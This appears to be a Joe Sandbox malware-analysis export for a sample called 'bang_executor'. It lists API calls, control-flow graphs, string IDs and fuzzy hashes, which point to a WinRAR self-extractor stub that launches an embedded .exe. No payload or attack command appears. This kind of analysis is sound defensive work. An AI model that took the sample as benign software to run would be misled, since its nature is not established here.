                                        • GetLastError.KERNEL32(?,00000011), ref: 004FDE3F
                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,00000000,00000000,00000000,?,00000800), ref: 004FDE92
                                        • _swprintf.LIBCMT ref: 004FDEC9
                                        • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007402,winrarsfxmappingfile.tmp,?,?,?,?,00533482,00000200), ref: 004FDF1D
                                        • GetCommandLineW.KERNEL32(?,?,?,?,00533482,00000200), ref: 004FDF33
                                        • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,00533482,00000400,00000001,00000001,?,?,?,?,00533482,00000200), ref: 004FDF8A
                                        • ShellExecuteExW.SHELL32(?), ref: 004FDFB2
                                        • WaitForInputIdle.USER32(?,00002710), ref: 004FDFE6
                                        • Sleep.KERNEL32(00000064,?,?,?,?,00533482,00000200), ref: 004FDFFA
                                        • UnmapViewOfFile.KERNEL32(?,?,0000421C,00533482,00000400,?,?,?,?,00533482,00000200), ref: 004FE023
                                        • CloseHandle.KERNEL32(?,?,?,?,?,00533482,00000200), ref: 004FE02C
                                        • _swprintf.LIBCMT ref: 004FE05F
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE0BE
                                        • SetDlgItemTextW.USER32(?,00000065,005165F4), ref: 004FE0D5
                                        • GetDlgItem.USER32(?,00000065), ref: 004FE0DE
                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 004FE0ED
                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004FE0FC
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE1A9
                                        • _wcslen.LIBCMT ref: 004FE1FF
                                        • _swprintf.LIBCMT ref: 004FE229
                                        • SendMessageW.USER32(?,00000080,00000001,?), ref: 004FE273
                                        • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 004FE28D
                                        • GetDlgItem.USER32(?,00000068), ref: 004FE296
                                        • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 004FE2AC
                                        • GetDlgItem.USER32(?,00000066), ref: 004FE2C6
                                        • SetWindowTextW.USER32(00000000,0053589A), ref: 004FE2E8
                                        • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 004FE348
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE35B
                                        • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001D8C0,00000000,?), ref: 004FE3FE
                                        • EnableWindow.USER32(00000000,00000000), ref: 004FE4CC
                                        • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 004FE50E
                                        • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 004FE532
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Item$MessageText$Send$Window_swprintf$File$DialogErrorLast$LongView_wcslen$CloseCommandCountCreateDispatchEnableExecuteFocusHandleIdleInputLineMappingModuleNameParamShellSleepTickTranslateUnmapWait__vswprintf_c_l
                                        • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                        • API String ID: 2963869496-1712381250
                                        • Opcode ID: bab61a46e60fd441460b6a44655ce764ddc0335e8b7a353cf6c975c4f4768955
                                        • Instruction ID: 6ffc3fc1a893c3741bbfcf14e67a070838e4aa4e321da23f248c94f2b294f657
                                        • Opcode Fuzzy Hash: bab61a46e60fd441460b6a44655ce764ddc0335e8b7a353cf6c975c4f4768955
                                        • Instruction Fuzzy Hash: D0420B7094034CBAEB31AB61DC49FFF7B68AB16709F10401BF704A61E2D7784A49DB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%


                                        APIs
                                          • Part of subcall function 004FD864: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 004FD875
                                          • Part of subcall function 004FD864: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 004FD886
                                          • Part of subcall function 004FD864: IsDialogMessageW.USER32(0001045C,?), ref: 004FD89A
                                          • Part of subcall function 004FD864: TranslateMessage.USER32(?), ref: 004FD8A8
                                          • Part of subcall function 004FD864: DispatchMessageW.USER32(?), ref: 004FD8B2
                                        • GetDlgItem.USER32(00000068,00543CF0), ref: 004FF81F
                                        • ShowWindow.USER32(00000000,00000005,?,?,004FD099,00000001,?,?,004FDAB9,005182F0,00543CF0,00543CF0,00001000,005250C4,00000000,?), ref: 004FF844
                                        • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 004FF853
                                        • SendMessageW.USER32(00000000,000000C2,00000000,005165F4), ref: 004FF861
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004FF87B
                                        • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 004FF895
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004FF8D9
                                        • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 004FF8E4
                                        • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 004FF8F7
                                        • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 004FF91E
                                        • SendMessageW.USER32(00000000,000000C2,00000000,0051769C), ref: 004FF92D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                        • String ID: \
                                        • API String ID: 3569833718-2967466578
                                        • Opcode ID: e9a9f44445ab6316644779f57a90569146293093ac53dbfde64edc90623e2900
                                        • Instruction ID: 272cf67dd3562f2e462dfb2602da148fec8877411f1f6078e5eb73bb5289f240
                                        • Opcode Fuzzy Hash: e9a9f44445ab6316644779f57a90569146293093ac53dbfde64edc90623e2900
                                        • Instruction Fuzzy Hash: 0A31D2712497186FE310EF24DC4AFAB7FA8EF6A708F000D19F6A19A191D764590CC7A6
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 708 4ffafc-4ffb2e call 501590 711 4ffd7e-4ffd95 call 5010f9 708->711 712 4ffb34-4ffb40 call 506433 708->712 712->711 717 4ffb46-4ffb6e call 502640 712->717 720 4ffb78-4ffb89 717->720 721 4ffb70 717->721 722 4ffb8b-4ffb92 720->722 723 4ffb94-4ffb9d 720->723 721->720 724 4ffb9f-4ffba3 722->724 723->724 725 4ffbfa 723->725 726 4ffba6-4ffbac 724->726 727 4ffbfe-4ffc00 725->727 730 4ffbae 726->730 731 4ffbcd-4ffbda 726->731 728 4ffc07-4ffc09 727->728 729 4ffc02-4ffc05 727->729 732 4ffc1c-4ffc32 call 4ed848 728->732 733 4ffc0b-4ffc12 728->733 729->728 729->732 734 4ffbb8-4ffbc2 730->734 735 4ffd53-4ffd55 731->735 736 4ffbe0-4ffbe4 731->736 746 4ffc4b-4ffc56 call 4ebccb 732->746 747 4ffc34-4ffc41 call 4f4168 732->747 733->732 737 4ffc14 733->737 739 4ffbc4 734->739 740 4ffbb0-4ffbb6 734->740 741 4ffd59-4ffd61 735->741 736->741 742 4ffbea-4ffbf4 736->742 737->732 739->731 740->734 744 4ffbc6-4ffbc9 740->744 741->727 742->726 745 4ffbf6 742->745 744->731 745->725 753 4ffc58-4ffc6f call 4ed563 746->753 754 4ffc73-4ffc80 ShellExecuteExW 746->754 747->746 752 4ffc43 747->752 752->746 753->754 754->711 755 4ffc86-4ffc8c 754->755 758 4ffc9f-4ffca1 755->758 759 4ffc8e-4ffc95 755->759 761 4ffcb8-4ffccb WaitForInputIdle call 50004d 758->761 762 4ffca3-4ffcac IsWindowVisible 758->762 759->758 760 4ffc97-4ffc9d 759->760 760->758 763 4ffd0e-4ffd1a CloseHandle 760->763 768 4ffcd0-4ffcd7 761->768 762->761 764 4ffcae-4ffcb6 ShowWindow 762->764 766 4ffd1c-4ffd29 call 4f4168 763->766 767 4ffd2b-4ffd39 763->767 764->761 766->767 777 4ffd66 766->777 770 4ffd6d-4ffd6f 767->770 771 4ffd3b-4ffd3d 767->771 768->763 772 4ffcd9-4ffce1 768->772 770->711 775 4ffd71-4ffd73 770->775 771->770 774 4ffd3f-4ffd45 771->774 772->763 776 4ffce3-4ffcf4 GetExitCodeProcess 772->776 774->770 778 4ffd47-4ffd51 774->778 775->711 779 4ffd75-4ffd78 ShowWindow 775->779 776->763 780 4ffcf6-4ffd00 776->780 777->770 778->770 779->711 781 4ffd07 780->781 782 4ffd02 780->782 781->763 782->781
                                        APIs
                                        • _wcslen.LIBCMT ref: 004FFB35
                                        • ShellExecuteExW.SHELL32(?), ref: 004FFC78
                                        • IsWindowVisible.USER32(?), ref: 004FFCA4
                                        • ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFCB0
                                        • WaitForInputIdle.USER32(?,000007D0), ref: 004FFCC1
                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 004FFCEC
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFD12
                                        • ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?,?,?,00000001,00000000), ref: 004FFD78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Window$Show$CloseCodeExecuteExitHandleIdleInputProcessShellVisibleWait_wcslen
                                        • String ID: .exe$.inf
                                        • API String ID: 3646668279-3750412487
                                        • Opcode ID: 199b8e391a0766b91dacbdd375541cb0598060356c23f00ac131f76c8a24dbf9
                                        • Instruction ID: efc92b9f156974fff9eaa5183e962ef6ecd6b9ab2494a0b02c1d211227f2fe43
                                        • Opcode Fuzzy Hash: 199b8e391a0766b91dacbdd375541cb0598060356c23f00ac131f76c8a24dbf9
                                        • Instruction Fuzzy Hash: F161B0351083889BD7309F20D8446BBBBE4AF95704F04482FFAC5973A0E778998D9B5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 783 50cfab-50cfc4 784 50cfc6-50cfd6 call 51159c 783->784 785 50cfda-50cfdf 783->785 784->785 792 50cfd8 784->792 786 50cfe1-50cfe9 785->786 787 50cfec-50d010 MultiByteToWideChar 785->787 786->787 790 50d1a3-50d1b6 call 5010f9 787->790 791 50d016-50d022 787->791 793 50d024-50d035 791->793 794 50d076 791->794 792->785 797 50d054-50d065 call 50bc8e 793->797 798 50d037-50d046 call 514660 793->798 796 50d078-50d07a 794->796 800 50d080-50d093 MultiByteToWideChar 796->800 801 50d198 796->801 797->801 811 50d06b 797->811 798->801 810 50d04c-50d052 798->810 800->801 804 50d099-50d0ab call 50d5bc 800->804 805 50d19a-50d1a1 call 50d213 801->805 812 50d0b0-50d0b4 804->812 805->790 814 50d071-50d074 810->814 811->814 812->801 815 50d0ba-50d0c1 812->815 814->796 816 50d0c3-50d0c8 815->816 817 50d0fb-50d107 815->817 816->805 818 50d0ce-50d0d0 816->818 819 50d153 817->819 820 50d109-50d11a 817->820 818->801 821 50d0d6-50d0f0 call 50d5bc 818->821 822 50d155-50d157 819->822 823 50d135-50d146 call 50bc8e 820->823 824 50d11c-50d12b call 514660 820->824 821->805 838 50d0f6 821->838 828 50d191-50d197 call 50d213 822->828 829 50d159-50d172 call 50d5bc 822->829 823->828 837 50d148 823->837 824->828 835 50d12d-50d133 824->835 828->801 829->828 841 50d174-50d17b 829->841 840 50d14e-50d151 835->840 837->840 838->801 840->822 842 50d1b7-50d1bd 841->842 843 50d17d-50d17e 841->843 844 50d17f-50d18f WideCharToMultiByte 842->844 843->844 844->828 845 50d1bf-50d1c6 call 50d213 844->845 845->805
                                        APIs
                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00507F99,00507F99,?,?,?,0050D1FC,00000001,00000001,62E85006), ref: 0050D005
                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0050D1FC,00000001,00000001,62E85006,?,?,?), ref: 0050D08B
                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,62E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0050D185
                                        • __freea.LIBCMT ref: 0050D192
                                          • Part of subcall function 0050BC8E: RtlAllocateHeap.NTDLL(00000000,?,?,?,00506A24,?,0000015D,?,?,?,?,00507F00,000000FF,00000000,?,?), ref: 0050BCC0
                                        • __freea.LIBCMT ref: 0050D19B
                                        • __freea.LIBCMT ref: 0050D1C0
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: ByteCharMultiWide__freea$AllocateHeap
                                        • String ID:
                                        • API String ID: 1414292761-0
                                        • Opcode ID: 026901ac83183ebeec612cce807d5b1b2d7c6273c1f3c0995649adfcefcf3944
                                        • Instruction ID: 9f5a8a2b1e4df55d0ced540992b329e4cdfd43c377c152f4fe0047d08d138cf0
                                        • Opcode Fuzzy Hash: 026901ac83183ebeec612cce807d5b1b2d7c6273c1f3c0995649adfcefcf3944
                                        • Instruction Fuzzy Hash: 6D519072600217AAEB258FA4CC45EBF7FBAFB85750F154629FD05D6180EB34DC84D6A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 848 4fd392-4fd3b0 GetCurrentProcess OpenProcessToken 849 4fd415 848->849 850 4fd3b2-4fd3ca GetTokenInformation 848->850 853 4fd417-4fd419 849->853 851 4fd3cc-4fd3d5 GetLastError 850->851 852 4fd3d7-4fd3f8 call 5089f6 GetTokenInformation 850->852 851->849 851->852 856 4fd3fa-4fd407 CopySid 852->856 857 4fd409-4fd413 call 5066a9 852->857 856->857 857->853
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00020008,?), ref: 004FD3A1
                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004FD3A8
                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,?), ref: 004FD3C2
                                        • GetLastError.KERNEL32 ref: 004FD3CC
                                        • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,?,?), ref: 004FD3F0
                                        • CopySid.ADVAPI32(00000044,?,00000000), ref: 004FD401
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Token$InformationProcess$CopyCurrentErrorLastOpen
                                        • String ID:
                                        • API String ID: 3984476752-0
                                        • Opcode ID: 723f62dd5577d5f954407f91ccedee32ab509cec10d93a42b22dc98a88af932b
                                        • Instruction ID: 135f76f60b847a4e11b8ff7e0bab85450b713465cb3719df922f2f534cacd81e
                                        • Opcode Fuzzy Hash: 723f62dd5577d5f954407f91ccedee32ab509cec10d93a42b22dc98a88af932b
                                        • Instruction Fuzzy Hash: 8E015B7590121CBFDB125BA0AC89EEF7B7DEB19354F100026F605A1190E7759A48AA24
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 860 50004d-500066 WaitForSingleObject 861 500068-500069 860->861 862 5000ae-5000b0 860->862 863 50006b-50007b PeekMessageW 861->863 864 50007d-500098 GetMessageW TranslateMessage DispatchMessageW 863->864 865 50009e-5000ab WaitForSingleObject 863->865 864->865 865->863 866 5000ad 865->866 866->862
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 00500059
                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00500073
                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00500084
                                        • TranslateMessage.USER32(?), ref: 0050008E
                                        • DispatchMessageW.USER32(?), ref: 00500098
                                        • WaitForSingleObject.KERNEL32(?,0000000A), ref: 005000A3
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                        • String ID:
                                        • API String ID: 2148572870-0
                                        • Opcode ID: f7a937ebc6c93880e228bed6072225e56dc869fca7041d96f7b15b5dbfbd51f4
                                        • Instruction ID: 0a5c47d9acb7b6422f7277ec4f28368209aa6eab93ff073ca2fa809ded021319
                                        • Opcode Fuzzy Hash: f7a937ebc6c93880e228bed6072225e56dc869fca7041d96f7b15b5dbfbd51f4
                                        • Instruction Fuzzy Hash: E2F03C72A0222DABCB205BA1DC4CECF7E6DEF56755F008011B50AD2090D774C589DBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        control_flow_graph 867 4ff191-4ff194 868 4ff31a-4ff31d 867->868 869 4ff19a-4ff1c4 GetTempPathW call 4ed52f 867->869 871 4ff6ea-4ff712 call 4fd5dd 868->871 872 4ff323-4ff329 868->872 877 4ff1c8-4ff1ec call 4e4c00 call 4ebccb 869->877 882 4fea89-4fea9d 871->882 883 4ff717-4ff739 call 5010f9 871->883 874 4ff32b 872->874 875 4ff335-4ff33c 872->875 874->875 875->871 892 4ff1ee-4ff203 SetDlgItemTextW 877->892 893 4ff1c6-4ff1c7 877->893 884 4fea9e-4feab3 call 4fd148 882->884 891 4ff73c-4ff741 call 5013f9 883->891 894 4feab5 884->894 892->871 896 4ff209-4ff210 892->896 893->877 897 4feab7-4feacc call 4f4168 894->897 896->871 899 4ff216-4ff231 call 50483c 896->899 906 4feace-4fead2 897->906 907 4fead9-4feadc 897->907 904 4ff28f-4ff297 899->904 905 4ff233-4ff23f 899->905 911 4ff2c9-4ff2f7 call 4fce62 call 4fc774 904->911 912 4ff299-4ff2c4 call 4f268b * 2 904->912 905->904 909 4ff241 905->909 906->897 910 4fead4 906->910 907->871 908 4feae2 907->908 913 4fed4f-4fed51 908->913 914 4fecae-4fecb0 908->914 915 4fed6d-4fed6f 908->915 916 4feae9-4feaec 908->916 917 4ff244-4ff248 909->917 910->871 911->871 946 4ff2fd-4ff315 EndDialog 911->946 912->911 913->871 925 4fed57-4fed68 SetWindowTextW 913->925 914->871 920 4fecb6-4fecc2 914->920 915->871 927 4fed75-4fed7c 915->927 916->871 922 4feaf2-4feb46 call 4fc5dd call 4edd18 call 4ec351 call 4ec48b call 4e7eed 916->922 923 4ff25c-4ff27f call 4f268b 917->923 924 4ff24a-4ff258 917->924 928 4fecd6-4fecdb 920->928 929 4fecc4-4fecd5 call 509f09 920->929 993 4fec85-4fec97 call 4ec3de 922->993 923->891 950 4ff285-4ff287 923->950 924->917 932 4ff25a 924->932 925->871 927->871 935 4fed82-4fed9b 927->935 941 4fecdd-4fece3 928->941 942 4fece5-4fecf0 call 4fd76e 928->942 929->928 932->904 936 4fed9d 935->936 937 4feda3-4fedb1 call 506433 935->937 936->937 937->871 956 4fedb7-4fedc0 937->956 948 4fecf5-4fecf7 941->948 942->948 946->871 954 4fecf9-4fed00 call 506433 948->954 955 4fed02-4fed22 call 506433 call 5066ae 948->955 950->904 954->955 976 4fed3b-4fed3d 955->976 977 4fed24-4fed2b 955->977 960 4fede9-4fedec 956->960 961 4fedc2-4fedc6 956->961 967 4fedf2-4fedf5 960->967 969 4feee4-4feef2 call 4f268b 960->969 966 4fedc8-4fedd0 961->966 961->967 966->871 971 4fedd6-4fede4 call 4f268b 966->971 974 4fedf7-4fedfc 967->974 975 4fee02-4fee1d 967->975 985 4feef4-4fef08 call 504b4e 969->985 971->985 974->969 974->975 988 4fee1f-4fee5a 975->988 989 4fee7a-4fee81 975->989 976->871 983 4fed43-4fed4a call 5066a9 976->983 981 4fed2d-4fed2f 977->981 982 4fed32-4fed3a call 509f09 977->982 981->982 982->976 983->871 1004 4fef0a-4fef0e 985->1004 1005 4fef15-4fef6f call 4f268b call 4fd41c GetDlgItem SetWindowTextW SendMessageW call 508796 985->1005 1022 4fee5c-4fee63 988->1022 1023 4fee6b 988->1023 995 4feeaf-4feed2 call 506433 * 2 989->995 996 4fee83-4fee9b call 506433 989->996 1009 4fec9d-4feca9 call 4ec367 993->1009 1010 4feb4b-4feb5f SetFileAttributesW 993->1010 995->985 1030 4feed4-4feee2 call 4f2663 995->1030 996->995 1015 4fee9d-4feeaa call 4f2663 996->1015 1004->1005 1011 4fef10-4fef12 1004->1011 1005->871 1043 4fef75-4fef89 SendMessageW 1005->1043 1009->871 1017 4fec05-4fec15 GetFileAttributesW 1010->1017 1018 4feb65-4feb98 call 4ed8ac call 4ed52f call 506433 1010->1018 1011->1005 1015->995 1017->993 1019 4fec17-4fec26 DeleteFileW 1017->1019 1047 4febab-4febb9 call 4edcd9 1018->1047 1048 4feb9a-4feba9 call 506433 1018->1048 1019->993 1028 4fec28-4fec2b 1019->1028 1022->891 1031 4fee69 1022->1031 1032 4fee70-4fee72 1023->1032 1034 4fec2f-4fec5b call 4e4c00 GetFileAttributesW 1028->1034 1030->985 1031->1032 1032->989 1045 4fec2d-4fec2e 1034->1045 1046 4fec5d-4fec73 MoveFileW 1034->1046 1043->871 1045->1034 1046->993 1049 4fec75-4fec7f MoveFileExW 1046->1049 1047->1009 1054 4febbf-4febff call 506433 call 502640 SHFileOperationW 1047->1054 1048->1047 1048->1054 1049->993 1054->1017
                                        APIs
                                        • GetTempPathW.KERNEL32(00000800,?), ref: 004FF1A7
                                          • Part of subcall function 004ED52F: _wcslen.LIBCMT ref: 004ED535
                                        • _swprintf.LIBCMT ref: 004FF1DC
                                          • Part of subcall function 004E4C00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004E4C13
                                        • SetDlgItemTextW.USER32(?,00000066,00534892), ref: 004FF1F5
                                        • EndDialog.USER32(?,00000001), ref: 004FF30F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1633431489.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true
                                        • Associated: 00000000.00000002.1633388033.00000000004E0000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633487430.0000000000516000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000522000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000529000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633512119.0000000000546000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000547000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.0000000000555000.00000002.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1633645504.000000000058C000.00000002.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_4e0000_bang_executor.jbxd
                                        Similarity
                                        • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
                                        • String ID: %s%s%u
                                        • API String ID: 110358324-1360425832
                                        • Opcode ID: 43790be50380ab992c614aa32c3bba53cad7ee2431eb4aa89ddc76211bd2fea4
                                        • Instruction ID: db7365aa38144f75e0db9b0835c2449c337ce25672705d9044480a05cf1a1c52
                                        • Opcode Fuzzy Hash: 43790be50380ab992c614aa32c3bba53cad7ee2431eb4aa89ddc76211bd2fea4
                                        • Instruction Fuzzy Hash: 94515F7650428DABDF31DBA18C45BFF37ACBF19304F440427EA09DA151EB789649CB58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 004F28AB: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 004F28D4
                                          • Part of subcall function 004F28AB: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,004F1309,Crypt32.dll,00000000,004F1383,00000200,?,004F1366,00000000,00000000,?), ref: 004F28F4
                                        • OleInitialize.OLE32(00000000), ref: 004FCCF2
                                        • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 004FCD29
